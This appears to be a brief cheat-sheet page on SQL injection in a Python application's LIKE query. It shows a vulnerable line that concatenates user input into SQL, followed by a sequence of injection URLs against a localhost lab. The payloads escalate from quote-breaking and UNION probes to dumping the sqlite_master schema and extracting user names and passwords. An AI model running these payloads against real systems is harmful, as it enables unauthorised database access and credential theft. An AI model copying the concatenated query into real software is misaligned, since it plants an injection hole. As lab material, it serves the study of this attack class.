Python - SQLI (Like)
Last updated
Was this helpful?
Was this helpful?
http://localhost:5000/home/Adminhttp://localhost:5000/home/Admin'db.execute("SELECT UserName, email FROM users WHERE UserName LIKE '%"+username+"%' ORDER BY UserId")http://localhost:5000/home/Admin%'--http://127.0.0.1:5000/home/Admin%' AND 1=1--http://localhost:5000/home/Admin%' union select 1--http://localhost:5000/home/Admin%' union select 1,2--http://localhost:5000/home/Admin%' union select 1,2 from sqlite_master--http://localhost:5000/home/Admin%' union select tbl_name,sql from sqlite_master limit 1,1--http://localhost:5000/home/Admin%' union select UserName,Password from users limit 0,1--